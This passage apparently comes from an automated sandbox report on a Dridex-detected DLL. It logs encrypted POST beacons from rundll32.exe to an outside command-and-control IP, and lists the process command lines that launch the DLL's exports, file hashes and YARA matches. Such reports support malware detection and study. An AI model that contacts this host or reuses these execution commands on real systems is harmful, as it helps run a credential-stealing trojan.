Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
[2021-10-28 03:09:58 UTC] kBytes transferred: 454, direction: IN
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:58 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 91 | Source IP: 192.168.2.4 | Source Port: 50219 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

[2021-10-28 03:09:58 UTC] kBytes transferred: 454, direction: OUT
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
[2021-10-28 03:09:58 UTC] kBytes transferred: 454, direction: OUT
Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
[2021-10-28 03:09:59 UTC] kBytes transferred: 459, direction: IN
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:59 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 92 | Source IP: 192.168.2.4 | Source Port: 50226 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

[2021-10-28 03:10:02 UTC] kBytes transferred: 459, direction: OUT
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
[2021-10-28 03:10:02 UTC] kBytes transferred: 459, direction: OUT
Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
[2021-10-28 03:10:03 UTC] kBytes transferred: 468, direction: IN
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:10:03 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 93 | Source IP: 192.168.2.4 | Source Port: 50227 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

[2021-10-28 03:10:02 UTC] kBytes transferred: 464, direction: OUT
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
[2021-10-28 03:10:02 UTC] kBytes transferred: 464, direction: OUT
Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
[2021-10-28 03:10:03 UTC] kBytes transferred: 469, direction: IN
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:10:03 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 05:05:59
Start date: 28/10/2021
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll'
Imagebase: 0xfd0000
File size: 893440 bytes
MD5 hash: 72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000003.790137281.0000000001120000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.1193417410.000000006E4C1000.00000020.00020000.sdmp, Author: Joe Security
Reputation: moderate

General

Start time: 05:06:00
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll',#1
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 05:06:00
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Bluewing
Imagebase: 0xc30000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000003.765489662.0000000004670000.00000040.00000010.sdmp, Author: Joe Security
Reputation: high

                                                                                                      General

                                                                                                      Start time:05:06:00
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll',#1
                                                                                                      Imagebase:0xc30000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.1194868368.000000006E4C1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000003.766529856.0000000002F40000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:05:06:04
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Earth
                                                                                                      Imagebase:0xc30000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000003.779791327.0000000002D40000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:05:06:09
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Masterjust
                                                                                                      Imagebase:0xc30000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000003.787445513.0000000004440000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

Disassembly

Code Analysis
